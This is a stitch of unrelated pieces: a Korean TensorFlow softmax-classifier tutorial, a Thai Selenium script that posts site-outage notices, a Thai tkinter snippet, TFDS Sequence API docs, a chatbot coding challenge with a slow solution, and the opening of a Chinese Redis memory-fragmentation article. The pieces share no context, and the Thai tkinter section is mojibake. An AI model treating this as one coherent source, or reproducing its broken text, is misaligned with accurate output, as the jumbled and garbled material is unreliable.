다음으로는 Cost(loss) function이다. Loss function은 수업 시간에 이야기 한 것처럼기본적으로 Y 와 Y hat(hypothesis)에 log를 취한 형태를 띠고 이를 Cross entropy라고 설명했었다. 그림에서 보이는 L이 Y에 해당하고, S(softmax function)이Y hat에 해당한다. 이를 D(distance, 즉 앞서 언급한 Cross entropy function을거친 결과) 라고 하고, 그 D의 결과들을 모두 더해 평균을 낸 것이 우리가 원하는 최종적인Cost function인 것이다. 그리고 어김없이 이 Cost를 minimize하기 위해 경사면 내려가기(Gradient Descent) 함수가 등장하는데, 여기서도 마찬가지로 Cost 함수를 미분한 기울기를alpha(learning rate)값을 곱하여 weight 값에서 빼주면서 최소 cost를 찾아가는 방식이다.따라서 결론적으로 optimizer의 선언은 지금까지와 항상 똑같은 한 문장으로 정의할 수 있다.
그럼 전체 코드를 한 번 살펴보도록 하자.
# Lab 6 Softmax Classifier import tensorflow as tf tf.set_random_seed(777) # for reproducibility #x1, x2, x3, x4 x_data = [[1, 2, 1, 1], [2, 1, 3, 2], [3, 1, 3, 4], [4, 1, 5, 5], [1, 7, 5, 5], [1, 2, 5, 6], [1, 6, 6, 6], [1, 7, 7, 7]] #One-Hot Encoding y_data = [[0, 0, 1], [0, 0, 1], [0, 0, 1], [0, 1, 0], [0, 1, 0], [0, 1, 0], [1, 0, 0], [1, 0, 0]] #의미에 따라 표현하자면 y_data는 [2, 2, 2, 1, 1, 1, 0, 0]이 될 것이다. X = tf.placeholder("float", [None, 4]) Y = tf.placeholder("float", [None, 3]) nb_classes = 3 #number of class W = tf.Variable(tf.random_normal([4, nb_classes]), name='weight') b = tf.Variable(tf.random_normal([nb_classes]), name='bias') # tf.nn.softmax computes softmax activations # softmax = exp(logits) / reduce_sum(exp(logits), dim) hypothesis = tf.nn.softmax(tf.matmul(X, W) + b) # Cross entropy cost/loss cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1)) optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # Launch graph with tf.Session() as sess: sess.run(tf.global_variables_initializer()) for step in range(2001): _, cost_val = sess.run([optimizer, cost], feed_dict={X: x_data, Y: y_data}) if step % 200 == 0: print(step, cost_val)
x_data를 먼저 살펴보면, x1 ~ x4에 해당하는 4개의 element로 구성된 데이터임을알 수 있고, y_data는 One-Hot Encoding 방식을 통해 표현되어 있는 것을확인할 수 있다. 여기서 One-Hot encoding이란, 이론 수업에서도 언급했지만 이름대로하나만 뜨겁게 한다 라는 의미로 받아들이면 이해가 쉽다. 다시 말해서 우리는 여기서세 개의 클래스의 구분을 표현하고 싶은데, 첫 번째 클래스를 의미하도록 하기 위해서는[1, 0, 0] 두 번째 클래스를 의미하려면 [0, 1, 0]과 같은 방식으로 작성하면 된다는 것이다.
따라서 placeholder를 정의할 때에도 shape을 작성하는 데 있어서 x_data는직관적으로 None(instance의 개수 제한 없음)과 4(element의 개수)를 부여하면 되고y_data는 One-Hot-Encoding 방식으로 작성했기 때문에 element의 개수는 3으로전달해줘야 한다. 반대로 말해서, One-Hot으로 표현할 때y_data의 shape은 Label의개수(우리가 구하려는 class의 종류의 수 nb_classes = 3)가 되는 것을 알 수 있다.
W와 b를 TensorFlow Variable로 정의할 때에도 shape을 주의해야 하는데weight에서는 입력되는 x_data의 element 수가 4개이므로 4를 주고 bias에는출력되는 Y의 클래스 수와 같은 종류 만큼 출력되어야 하므로 nb_classes 값이 된다.
이후에 그래프를 명세하는 과정은 앞서 언급한 것처럼 변경된 수식에 대한 내용만 수정하면나머지 절차는 이전부터 행하던 방식과 동일하다. Hypothesis는 X와 W의 행렬 곱셈결과에 b값을 더해주고 softmax 함수를 통과시킨 것으로 정의할 수 있을 것이고,cost 또한 Cross entropy 함수의 수식대로 작성한 뒤 모두 더해서 평균을 구하는함수로 정의하고 나서 경사 하강법으로 optimizer를 선언해주면 되는 것이다.
학습이 이루어지는 과정 또한 마찬가지이다. 세션을 열고, 초기화를 시켜준 뒤에 Loop을돌면서 optimizer를 세션에서 실행시키면서 feed_dict를 통해x_data,y_data를 입력으로 던져주게 된다.
위 코드의 결과는 다음과 같이 출력된다.각 200회 마다 step의 값과 해당 시점의 cost값이 출력되며그 cost값이 처음에 무작위한 값으로 시작하여 학습 회수를 거듭하면서값이 점차 매우 작은 값으로 수렴하는 것을 확인 할 수 있다.
0 6.926112200 0.6005015400 0.47295815600 0.37342924800 0.280183731000 0.232805221200 0.210653441400 0.192299041600 0.176823231800 0.163595562000 0.15216158
다음은 우리가 작성한 모델이 학습한 결과가 올바른지에 대해 테스트하는 내용이다.
print('--------------') # Testing & One-hot encoding a = sess.run(hypothesis, feed_dict={X: [[1, 11, 7, 9]]}) print(a, sess.run(tf.argmax(a, 1))) print('--------------') b = sess.run(hypothesis, feed_dict={X: [[1, 3, 4, 3]]}) print(b, sess.run(tf.argmax(b, 1))) print('--------------') c = sess.run(hypothesis, feed_dict={X: [[1, 1, 0, 1]]}) print(c, sess.run(tf.argmax(c, 1))) print('--------------') all = sess.run(hypothesis, feed_dict={X: [[1, 11, 7, 9], [1, 3, 4, 3], [1, 1, 0, 1]]}) print(all, sess.run(tf.argmax(all, 1)))
위 코드에서, 교수님께서 tf.argmax에 대해서 설명해주셨는데, 두 번째 인자로 전달되는axis에 대한 내용이 이해가 되지 않아서 구글에 검색을 통해 찾아보았다.
이 axis, 다시 말해 축에 대한 개념은 우리가 이 강의의 초반부에서 공부했던기본적인 내용 중의 하나인 Rank라는 개념과 동일하다. Rank란 달리 말해배열의 차원 수를 뜻하는데, 1차원 배열의 Rank는 1, 2차원 배열의 Rank는 2와 같은 느낌인 것이다.
첫 번째 인자로 전달된 배열이 일차원 배열일 경우에는axis값으로 0만을 사용할 수 있으며 이는 배열의 열(세로축)만을 기준으로 최대값을찾아내 반환한다. 2차원 배열, 즉 Rank가 2인 행렬일 경우에는 axis값으로0과 1을 사용할 수 있으며 0일 경우 앞에서의 설명과 마찬가지, 1일 경우에는 각 행에대하여 최대값이 위치한 인덱스를 묶어 하나의 배열로 반환하게 된다.
이를 일반화시키면, axis의 값으로는 첫 번째 인자에 해당하는 배열의 Rank 값 - 1부터 0까지에 해당하는 값이 전달 가능한 경우의 수가 될 것이다.
덧붙여 이 argmax함수를 사용하는 이유는 우리가 위에서 y_data를 정의할 때One-Hot-Encoding 방식을 통해 표현하였기 때문에 이 Label이 의미하는숫자를 찾기 위해서 사용된다고 한다.
따라서 간단한 예시를 들어 다음과 같은 a라는 Rank가 2인 행렬이 있다고 할 때
a = tf.constant([[3, 10, 1], [4, 5, 6], [0, 8, 7]]) print(session.run(tf.argmax(a, 0))) #1 print(session.run(tf.argmax(a, 1))) #2
1번과 같은 경우에는 a행렬에서 세로 축만을 기준으로 최대값을 탐색하고,2번과 같은 경우에는 a행렬에서 각 행에 대한 최대값을 탐색하므로
[1, 0, 2][1, 2, 1]
와 같은 1차원 배열을 반환하게 될 것이다. 위 내용의 출처
따라서 위 학습 결과 테스트에 대한 결과는 아래와 같다.우리는 데이터와 모델을 명세할 때 y_data를 One-Hot-Encoding 방식을사용하여 Rank가 2인 행렬로 작성하였으며 각 Label이 의미를 갖는 단위가 각 행에해당하므로 axis = 1을 전달해 아래와 같은 일차원 배열로 반횐되는 결과를 얻을 수 있다.
[[1.3890490e-03 9.9860185e-01 9.0613084e-06]] [1] ------------- [[0.9311919 0.06290216 0.00590591]] [0] ------------- [[1.2732815e-08 3.3411323e-04 9.9966586e-01]] [2] ------------- [[1.3890490e-03 9.9860185e-01 9.0613084e-06] [9.3119192e-01 6.2902197e-02 5.9059085e-03] [1.2732815e-08 3.3411323e-04 9.9966586e-01]] [1 0 2]
두 번째 실습에 들어가기 앞서, Softmax function의 Cost function을정의하는 새로운 방식에 대해 도입해보도록 한다.
본 실습을 도입하면서 Logit이라는 개념에 대해서 도입했는데,어떤 Label이 될지에 대한 확률값을 반환하는 Hypothesis를 정의할 때 Softmax 함수를통과시키기 전의, 기본적인 형태의 값을 의미한다. (다른 말로 Scores, 즉 예측 값.)
이전 실습에서 우리가 작성했던 Cost function은 사진에서 1번에 해당하는, 수식을 그대로풀어 옮긴 한 줄짜리 코드였지만, softmax_cross_entropy_with_logits라는TensorFlow 함수를 이용하여 2번과 같이 간단히 요약해 작성할 수 있다.여기서 cost_i는 -tf.reduce_sum ~에 해당하는 부분으로 대치됨을 알 수 있다.
이 과정을 통해 단순히 tf.nn.softmax함수를 통해 Hypothesis를 정의한 뒤 cost를수식으로 작성하지 않고 tf.matmul(X, W) + b를 logits이라는 변수로 둔 뒤동명의 Property로 전달해주면 된다. 여기서 labels로 전달되는 것은 우리가 1번 방식에서전달한 Y 벡터가 One-Hot-Encoding 방식으로 전달되었기 때문에 이를 명시적으로 이름을명시적으로 변경한 뒤에 전달해준 것이다.
따라서 결론적으로 이 두 방식 모두에 해당하는 cost 함수는 정확하게 일치한다.
이번 실습의 예제는 위와 같은 데이터를 갖는다. 동물들이 갖는 여러 특징들을 통해서(다리가 몇개인지, 뿔이 달렸는지, 등등…) 어떤 동물인지를 예측하는 예제이다.표를 살펴보았을 때, 0번 째부터 마지막 직전까지에 해당하는 열은 각 동물들의 특징에 대해,즉 x1 ~ xn에 해당할 것이고 마지막 열은 분류된 결과, 즉 Label 값에 대응하는Y값이 될 것이다. 또한 행은 instance의 수, 즉 주어진 동물의 수라고 생각하면 되겠다.
이 데이터에 대해서 조금 더 자세히 살펴보자.
이 슬라이드에 대한 설명에서 조금은 복잡한 Reshape에 대한 개념이 등장한다.우선 우리가 사용할 마지막 열에 해당하는 Y 행렬의 shape은 n개의 행에 1열을 갖는다.나아가, 앞서 설명한 것처럼 우리가 사용할 Y 데이터는 결론적으로 One-Hot 방식으로인코딩 되어야 하므로 tf.one_hot 함수를 이용하여 7종류의 클래스 수를 인자로 함께전달해 구할 수 있다.
그러나 슬라이드의 하단에 적혀있는 것처럼, tf.one_hot 함수를사용하게 되면 Y의 각 Label들이 인코딩되면서 Rank가 한 차원 늘어나게 된다.무슨 말이냐 하면, 0은 [1, 0, 0, 0, 0, 0, 0]으로, 3은 [0, 0, 0, 1, 0, 0, 0]으로차원 축이 하나 늘어나게 되면서 우리가 원하는 y_data의 shape을 잃게 된다.
따라서 이를 해결하기 위해 tf.reshape 함수를 사용하여 이 늘어난 한 차원을줄이는 작업을 수행하도록 한다. (여기서 등장하는 -1에 대해서는 명확하게 이해하지는못했지만 TensorFlow 공식 문서를 참조한 결과 구조를 암시(infer)하기 위해 사용된다고한다. shape을 적절히 조절하는 용도로 사용되는 것으로 추정.)
여기까지 이해했다면 실행하는 방법은 간단하며 그래프에 대한 코드는 다음과 같다.
# Lab 6 Softmax Classifier import tensorflow as tf import numpy as np tf.set_random_seed(777) # for reproducibility # Predicting animal type based on various features xy = np.loadtxt('data-04-zoo.csv', delimiter=',', dtype=np.float32) x_data = xy[:, 0:-1] y_data = xy[:, [-1]] print(x_data.shape, y_data.shape) ''' (101, 16) (101, 1) ''' nb_classes = 7 # 0 ~ 6 X = tf.placeholder(tf.float32, [None, 16]) # x_data의 개수 16개. Y = tf.placeholder(tf.int32, [None, 1]) # 0 ~ 6 Y_one_hot = tf.one_hot(Y, nb_classes) # one hot print("one_hot:", Y_one_hot) Y_one_hot = tf.reshape(Y_one_hot, [-1, nb_classes]) print("reshape one_hot:", Y_one_hot) ''' one_hot: Tensor("one_hot:0", shape=(?, 1, 7), dtype=float32) reshape one_hot: Tensor("Reshape:0", shape=(?, 7), dtype=float32) ''' W = tf.Variable(tf.random_normal([16, nb_classes]), name='weight') b = tf.Variable(tf.random_normal([nb_classes]), name='bias') # tf.nn.softmax computes softmax activations # softmax = exp(logits) / reduce_sum(exp(logits), dim) logits = tf.matmul(X, W) + b hypothesis = tf.nn.softmax(logits) # Cross entropy cost/loss # softmax_cross_entropy_with_logits cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=tf.stop_gradient([Y_one_hot]))) optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost)
위 코드는 앞서 설명한 내용과 기존에 진행하던 실습 내용들과 상당 부분 중복되므로 자세한 설명은 생략하도록 하겠다.
조금 더 새로운 내용은 학습 과정 부분에서 등장한다.
prediction = tf.argmax(hypothesis, 1) correct_prediction = tf.equal(prediction, tf.argmax(Y_one_hot, 1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # Launch graph with tf.Session() as sess: sess.run(tf.global_variables_initializer()) for step in range(2001): # Optimizer, cost와 accuracy를 학습시켜 100회에 한 번씩 출력한다. _, cost_val, acc_val = sess.run([optimizer, cost, accuracy], feed_dict={X: x_data, Y: y_data}) if step % 100 == 0: print("Step: {:5}\tCost: {:.3f}\tAcc: {:.2%}".format(step, cost_val, acc_val)) # 학습이 완료된 후 X 데이터만 던져주고 예측이 정확한지 확인하는 과정 pred = sess.run(prediction, feed_dict={X: x_data}) # y_data: (N,1) = flatten => (N, ) matches pred.shape for p, y in zip(pred, y_data.flatten()): print("[{}] Prediction: {} True Y: {}".format(p == int(y), p, int(y))) ''' 출력 결과 Step: 0 Loss: 5.106 Acc: 37.62% Step: 100 Loss: 0.800 Acc: 79.21% Step: 200 Loss: 0.486 Acc: 88.12% ... Step: 1800 Loss: 0.060 Acc: 100.00% Step: 1900 Loss: 0.057 Acc: 100.00% Step: 2000 Loss: 0.054 Acc: 100.00% [True] Prediction: 0 True Y: 0 [True] Prediction: 0 True Y: 0 [True] Prediction: 3 True Y: 3 ... [True] Prediction: 0 True Y: 0 [True] Prediction: 6 True Y: 6 [True] Prediction: 1 True Y: 1 '''
코드의 흐름에 따른 부연 설명은 주석으로 작성하였고 축약된 출력 결과는 코드 블럭의 하단부와 같다. 학습 과정과 확인 과정에서 볼 수 있듯이 예측 결과가 매우 정확한 것을 알 수 있다.
prediction은 가설 함수의 예측 값을 바탕으로 한 결과 Label에 해당한다.correct 값은 실제 결과 Label과 일치하는지에 대한 참, 거짓 결과를 뜻하며,accuracy는 위의 두 예측,실제 값의 일치 여부를 전체에 대해 평균을 매긴 정확도 값이다.
zip과 flatten은 파이썬 표준 라이브러리에 포함된 내장 함수로서flatten은 다차원 배열을 일차원 배열로 이름 그대로 평평하게 펴주는 역할을 하고zip 함수는 같은 개수로 이루어진 자료형을 하나로 묶어주는 역할을 한다고 한다.
여기까지 Softmax Classification에 대한 이론적인 내용을 공부하고 실습을 진행해 보았다.
|
เมื่อทำการเข้าสู่ระบบแล้วระบบเกิดเข้าไม่ได้จึงทำให้มีการเช็คระบบขึ้นมาเพื่อคอยเช็คข้อมูลหรือระบบต่างๆว่ามีการ
ทำงานปกติดีหรือไม่และเมื่อระบบมีการทำงานที่ผิดปกติจึงต้องมีการส่งค่าที่ผิดปกติ ไปแจ้งเพื่อให้ผู้ดูแลระบบ รับรู้
เพื่อดำเนินการแก้ไข ว่าเกิดความผิดปกติที่ตำแหน่งในของระบบ ทั้งนี้การเช็คระบบหรือโค้ดที่ใช้สำหรับดัก error จึง
ต้องมีการว่างดัก error แจ้ง ทุก ๆตำแหน่ง เพื่อที่จะ ได้ง่ายต่อการ แก้ไข
โค้ดที่ใช้สำหรับดัก error
Code: Select all
1 for i in range(2):
2 try:
3 print("กำลังทำการเข้าระบบ")
4 if self.driver.get(wed): break
5
6 except:
7 print("ทำใหม่")
8 pass
9 time.sleep(2)
10 else:
11 print("error")
12 self.driver.get(wed_mindphp)
13 login = self.wait.until(ec.visibility_of_element_located((By.NAME, "username")))
14 ActionChains(self.driver).move_to_element(login).perform()
15 a = self.driver.find_element_by_name("username")
16 a.clear()
17 a.send_keys(user1)
18 a = self.driver.find_element_by_name("password")
19 a.clear()
20 a.send_keys(password1)
21 time.sleep(3)
22 self.driver.find_element_by_name("login").click()
23
24 time.sleep(5)
25
26 self.driver.find_element_by_xpath("//a[contains(.,'MT27 - ธวัชชัย แสนหาญ')]").click()
27 self.driver.find_element_by_link_text("ตั้งกระทู้ใหม่").click()
28 a = self.driver.find_element_by_name("subject")
29 a.clear()
30 a.send_keys("เว็บระบบของ Moozii cart ล่ม")
31 a = self.driver.find_element_by_name("message")
32 a.clear()
33 a.send_keys("ทำการ รีเซ็ตฐานข้อมูลเว็บ moozii cart")
34 self.driver.find_element_by_name("preview").click()
บรรทัดที่ 1 เป็นคำสั่ง ลูป for ให้ทำการวนลูป 2 ครั้ง
บรรทัดที่ 2 - 4 เป็นคำสั่งไว้สำหรับเช็ค if self.driver.get(wed): break ที่เข้า เข้าได้ไหม ถ้าเข้าได้หรือเจอให้ break ถ้าเข้าไม่ได้หรือไม่เจอให้ เข้าexcept
บรรทัดที่ 6-8 exceptตัวนี้ ให้ทำการ pass หรือ ผ่าน ให้วนกลับไปทำ Try อีกครั้ง (เมื่อทำครบลูป for 2 ครั้งแล้วให้ออกจากลูป )
บรรทัดที่ 10 คำสั่ง else:
บรรทัดที่ 11 - 34 จะอยู่ในลูปการทำงานของ else เมื่อไม่เข้าเงื่อนไขของ if โดยในส่วนนี้จะเป็นกระบวนการทำงานให้ทำการโพสต์แจ้ง ที่หน้าเว็บของผู้ดูแลระบบว่ามีการ error ที่ตำแหน่งนี้
โค้ดที่ใช้สำหรับกด โพสต์
Code: Select all
self.driver.find_element_by_name("post").click()
รูปนี้เป็นการวนลูป หา เว็บที่ต้องการจะเข้า (ในรอบที่2) รูปนี้เป็นการ โพสแจ้ง ของในหน้าเว็บของผู้ดูแลระบบเมื่อ เว็บที่จะเข้าเกิด error หรือ ระบบล่ม (ในรูปเป็นการแสดงตัวอย่างข้อความ ที่จะโพสแต่ยังไม่ได้ทำการโพส)
|
à¸à¸±à¸§à¸à¸¢à¹à¸²à¸
Code: Select all
from tkinter import filedialog
from tkinter import *
root = Tk()
def selection():
root.filename = filedialog.askopenfile(initialdir = "/",title = "Select file",filetypes = (("files","*.exe"),("all files","*.*")))
print(root.filename)
Button(text = ' Browse ' ,bd = 3 ,font = ('',10),padx=5,pady=5, command=selection).grid(row=1,column=1)
root.mainloop()
à¸à¸¥à¸£à¸±à¸
à¹à¸¡à¸·à¹à¸à¸à¸à¸à¸¸à¹à¸¡ Browse à¸à¸°à¸à¸¶à¹à¸à¸«à¸à¹à¸²à¸à¹à¸²à¸à¹à¸«à¹à¹à¸£à¸²à¹à¸¥à¸·à¸à¸à¹à¸à¸¥à¹
|
View source on GitHub
Composite FeatureConnector for a dict where each value is a list.
Inherits From: FeatureConnector
tfds.features.Sequence(
feature, length=None, **kwargs
)
Sequence correspond to sequence of tfds.features.FeatureConnector. Atgeneration time, a list for each of the sequence element is given. The outputof tf.data.Dataset will batch all the elements of the sequence together.
If the length of the sequence is static and known in advance, it should bespecified in the constructor using the length param.
Note that Sequence does not support features which are of typetf.io.FixedLenSequenceFeature.
Example:
At construction time:
tfds.features.Sequence(tfds.features.Image(), length=NB_FRAME)
or:
tfds.features.Sequence({
'frame': tfds.features.Image(shape=(64, 64, 3))
'action': tfds.features.ClassLabel(['up', 'down', 'left', 'right'])
}, length=NB_FRAME)
During data generation:
yield {
'frame': np.ones(shape=(NB_FRAME, 64, 64, 3)),
'action': ['left', 'left', 'up', ...],
}
Tensor returned by .as_dataset():
{
'frame': tf.Tensor(shape=(NB_FRAME, 64, 64, 3), dtype=tf.uint8),
'action': tf.Tensor(shape=(NB_FRAME,), dtype=tf.int64),
}
At generation time, you can specify a list of features dict, a dict of listvalues or a stacked numpy array. The lists will automatically be distributedinto their corresponding FeatureConnector.
Args
feature dict, the features to wrap
length int, length of the sequence if static and known in advance
**kwargs dict, constructor kwargs of tfds.features.FeaturesDict
Attributes
dtype Return the dtype (or dict of dtype) of this FeatureConnector.
feature The inner feature.
shape Return the shape (or dict of shape) of this FeatureConnector.
Methods
decode_batch_example
decode_batch_example( tfexample_data)
Decode multiple features batched in a single tf.Tensor.
This function is used to decode features wrapped intfds.features.Sequence().By default, this function apply decode_example on each individualelements using tf.map_fn. However, for optimization, features canoverwrite this method to apply a custom batch decoding.
Args
tfexample_data Same tf.Tensor inputs as decode_example, but withand additional first dimension for the sequence length.
Returns
tensor_data Tensor or dictionary of tensor, output of the tf.data.Dataset object
decode_example
decode_example(
serialized_example, decoders=None
)
Decode the serialize examples.
Args
serialized_example Nested dict of tf.Tensor
decoders Nested dict of Decoder objects which allow to customize thedecoding. The structure should match the feature structure, but onlycustomized feature keys need to be present. Seethe guidefor more info.
Returns
example Nested dict containing the decoded nested examples.
decode_ragged_example
decode_ragged_example( tfexample_data)
Decode nested features from a tf.RaggedTensor.
This function is used to decode features wrapped in nestedtfds.features.Sequence().By default, this function apply decode_batch_example on the flat valuesof the ragged tensor. For optimization, features canoverwrite this method to apply a custom batch decoding.
Args
tfexample_data tf.RaggedTensor inputs containing the nested encodedexamples.
Returns
tensor_data The decoded tf.RaggedTensor or dictionary of tensor,output of the tf.data.Dataset object
encode_example
encode_example( example_dict)
Encode the feature dict into tf-example compatible input.
The input example_data can be anything that the user passed at data generation. For example:
For features:
features={
'image': tfds.features.Image(),
'custom_feature': tfds.features.CustomFeature(),
}
At data generation (in _generate_examples), if the user yields:
yield {
'image': 'path/to/img.png',
'custom_feature': [123, 'str', lambda x: x+1]
}
Then:
tfds.features.Image.encode_examplewill get'path/to/img.png'as input
tfds.features.CustomFeature.encode_examplewill get `[123, 'str', lambda x: x+1] as input
Args
example_data Value or dictionary of values to convert into tf-example compatible data.
Returns
tfexample_data Data or dictionary of data to write as tf-example. Datacan be a list or numpy array.Note that numpy arrays are flattened so it's the feature connectorresponsibility to reshape them in decode_example().Note that tf.train.Example only supports int64, float32 and string sothe data returned here should be integer, float or string. User typecan be restored in decode_example().
from_config
@classmethodfrom_config( root_dir: str ) -> "FeatureConnector"
Reconstructs the FeatureConnector from the config file.
Usage:
features = FeatureConnector.from_config('path/to/features.json')
Args
root_dir Directory containing to the features.json file.
Returns
The reconstructed feature instance.
from_json
@classmethodfrom_json( value:tfds.typing.Json) -> "FeatureConnector"
FeatureConnector factory.
This function should be called from the tfds.features.FeatureConnectorbase class. Subclass should implement the from_json_content.
Example:
feature = tfds.features.FeatureConnector.from_json(
{'type': 'Image', 'content': {'shape': [32, 32, 3], 'dtype': 'uint8'} }
)
assert isinstance(feature, tfds.features.Image)
Args
value dict(type=, content=) containing the feature to restore.Match dict returned by to_json.
Returns
The reconstructed FeatureConnector.
from_json_content
@classmethodfrom_json_content( value:tfds.typing.Json) -> "Sequence"
FeatureConnector factory (to overwrite).
Subclasses should overwritte this method. importing the feature connector from the config.
This function should not be called directly. FeatureConnector.from_jsonshould be called instead.
This function See existing FeatureConnector for example of implementation.
Args
value FeatureConnector information. Match the dict returned byto_json_content.
Returns
The reconstructed FeatureConnector.
get_serialized_info
get_serialized_info()
See base class for details.
get_tensor_info
get_tensor_info()
See base class for details.
load_metadata
load_metadata( *args, **kwargs)
See base class for details.
repr_html
repr_html( ex: np.ndarray) -> str
Returns the HTML str representation of the object.
repr_html_batch
repr_html_batch( ex: np.ndarray) -> str
Returns the HTML str representation of the object (Sequence).
repr_html_ragged
repr_html_ragged( ex: np.ndarray) -> str
Returns the HTML str representation of the object (Nested sequence).
save_config
save_config(
root_dir: str
) -> None
Exports the FeatureConnector to a file.
Args
root_dir path/to/dir containing the features.json
save_metadata
save_metadata( *args, **kwargs)
See base class for details.
to_json
to_json() -> tfds.typing.Json
Exports the FeatureConnector to Json.
Each feature is serialized as a dict(type=..., content=...).
type: The cannonical name of the feature (module.FeatureName).
content: is specific to each feature connector and defined into_json_content. Can contain nested sub-features (like fortfds.features.FeaturesDictandtfds.features.Sequence).
For example:
tfds.features.FeaturesDict({
'input': tfds.features.Image(),
'target': tfds.features.ClassLabel(num_classes=10),
})
Is serialized as:
{
"type": "tensorflow_datasets.core.features.features_dict.FeaturesDict",
"content": {
"input": {
"type": "tensorflow_datasets.core.features.image_feature.Image",
"content": {
"shape": [null, null, 3],
"dtype": "uint8",
"encoding_format": "png"
}
},
"target": {
"type": "tensorflow_datasets.core.features.class_label_feature.ClassLabel",
"num_classes": 10
}
}
}
Returns
A dict(type=, content=). Will be forwarded tofrom_json when reconstructing the feature.
to_json_content
to_json_content() -> tfds.typing.Json
FeatureConnector factory (to overwrite).
This function should be overwritten by the subclass to allow re-importing the feature connector from the config. See existing FeatureConnector for example of implementation.
Returns
Dict containing the FeatureConnector metadata. Will be forwarded tofrom_json_content when reconstructing the feature.
__getitem__
__getitem__( key)
Convenience method to access the underlying features.
|
The Challenge :
You have a list conversations, in which each element is a conversation that is represented as an array of words. You need to create a chatbot that will complete a conversation that is currently in progress,
currentConversation.
To do that, the chatbot must find the conversation from the given list that has the largest number of unique words that match with words from the
currentConversation. If there are several conversations that match this condition, the chatbot should use the one that appears first in conversations. If no conversation from the list contains any matching words fromcurrentCoversation, the chatbot should leavecurrentConversationas it is.
If there is a conversation that can complete
currentConversation, the chatbot should find the first word in it that appears after all the matching words. The chatbot should then append this word, along with all the words that follow it in that conversation, tocurrentConversation.
Return the final state of
currentConversation.
Example
For conversations =
[ ["where", "are", "you", "live", "i", "live", "in", "new", "york"], ["are", "you", "going", "somewhere", "tonight", "no", "i", "am", "too", "tired", "today"], ["hello", "what", "is", "your", "name", "my", "name", "is", "john"]] and currentConversation = ["hello", "john", "do", "you", "have", "a", "favorite", "city", "to", "live", "in", "yes", "it", "is"], the output should be chatBot(conversations, currentConversation) = ["hello", "john", "do", "you", "have", "a", "favorite", "city", "to", "live", "in", "yes", "it", "is", "new", "york"].
The second conversation has only one matching word, "you". But the other two conversations both have three unique matching words. In the first conversation, the matches are "you", "live", and "in". In the third conversation, the matches are "hello", "john", and "is". Since we have two options that could complete our current conversation, we should choose the one that appears earlier in the list, so we use the first conversation. In that conversation, the last matching word is "in", so we add the last two words, "new" and "york", to
currentConversationto complete it.
For conversations =
[ ["lets", "have", "some", "fun"], ["i", "never", "get", "it"], ["be", "aware", "of", "this", "house"], ["he", "will", "call", "her"]] and currentConversation = ["can", "you", "please"], the output should be chatBot(conversations, currentConversation) = ["can", "you", "please"].
None of the conversations have any words that match words in
currentConversation, so we add nothing to it.
Input/Output
[time limit] 4000ms (py3) [input] array.array.string conversations
An array of conversations, where each conversation is represented as an array of strings. Each string contains only lowercase English letters.
Guaranteed constraints:
1 ⤠conversations.length ⤠104
1 ⤠conversations[i].length < 100
1 ⤠conversations[i][j].length ⤠15
[input] array.string currentConversation
The conversation in progress, which needs to be completed by the chatbot. Each string contains only lowercase English letters.
Guaranteed constraints:
1 ⤠currentConversation.length ⤠100
1 ⤠currentConversation[i].length ⤠15
[output] array.string
The completed
currentConversation.
MY SOLUTION ok i compiled it, it works but it is not fast enough
def is_unique(word,wlist):
nb = 0
for w in wlist:
if w == word:
nb = nb+1
if nb == 1:
return True
return False
def find_max(conversations_stats):
maxs = conversations_stats[0]
ind_max = 0
for x in range(1,len(conversations_stats)):
if conversations_stats[x] > maxs:
maxs = conversations_stats[x]
ind_max = x
return ind_max, maxs
def chatBot(conversations, currentConversation):
rslt = currentConversation
lc = len(conversations)
conversations_stats = [0 for i in range(lc)]
conversations_li = [0 for i in range(lc)]
#for x in range(lc):
for x, wlist in enumerate(conversations, start=0): # Python indexes start at zero
#wlist = conversations[x]
#wl = len(wlist)
conversations_li[x]=0
conversations_stats[x] = 0
#for y in range(wl):
for y, a_word in enumerate(wlist, start=0):
#a_word = wlist[y]
if a_word in currentConversation:
if is_unique(a_word,wlist):
conversations_stats[x] = conversations_stats[x] + 1
conversations_li[x]=y
#print('word c'+str(conversations_li[x])+' cc'+str(x)+' :'+a_word)
# ok the one with max unique matching
ind_max, maxs = find_max(conversations_stats)
#seaching for the last match
#print(maxs)
if maxs == 0:
return rslt
else:
wlist = conversations[ind_max]
cl=len(wlist)
for k in range(conversations_li[ind_max]+1,cl):
rslt.append(wlist[k])
return rslt
return rslt
|
本文关键字:玩转Redis、Redis内存碎片、Redis内存释放;
大纲
背景
如何查看Redis内存数据
内存为何不释放
什么是内存碎片
Redis的内存碎片是如何形成的
如何释放内存
生产环境整理内存碎片的注意事项
公司某业务使用的Redis集群是自建的,前段时间计划将自建Redis集群迁移到购买的阿里云集群。
老集群共有 350W key,占用内存 8.8 G,DTS迁移前分析发现有近两百万的key无需迁移,于是提前删除了这两百万key。
删除key后发现redis内存竟然几乎无变化,350W key删除了两百万,怎么也得释放几G内存吧。难道删除失败了?通过比对数据发现,计划被删除的数据确实已经删除了。
为什么删除了两百万key,内存未释放呢?这个问题一直困扰着我,通过查阅资料终于弄明白了。
进入Redis命令行界面后,使用 info memory 命令(集群使用 cluster info 命令) 即可查看当前Redis相关内存信息,部分信息展示如下:
127.0.0.1:6379> info memory
# Memory
# Redis 保存数据申请的内存空间
used_memory:9469412118
used_memory_human:8.82G
# 操作系统分配给 Redis 进程的内存空间
used_memory_rss:11351138316
used_memory_rss_human:10.57G
# Redis 进程在运行过程中占用的内存峰值
used_memory_peak:12618222522
used_memory_peak_human:11.75G
# 内存碎片率,used_memory_rss / used_memory
mem_fragmentation_ratio:1.20
# Redis 最大可用内存,0表示不限制
maxmemory:0
maxmemory_human:0B
# 内存分配器
mem_allocator:jemalloc-5.1.0
我们来解释下每个属性的含义:
used_memory:Redis 保存数据申请的内存空间,包含Redis进程及数据占用内存,单位 Byte;
used_memory_rss:操作系统分配给 Redis 进程的内存空间(包含内存碎片占用的空间),是从操作系统角度看的数据;此数据结果约等于top、ps命令看到的数据结果。
used_memory_peak:Redis 进程在运行过程中占用的内存峰值,used_memory_peak >= used_memory;
maxmemory:Redis 最大可用内存,0表示不限制。可以方便的实现对一台服务器部署多个Redis进程的内存控制;防止所用内存超过服务器物理内存;便于数据超出内存限制时执行LRU等删除策略。
XXX_human:表示以可读的方式返回XXX。
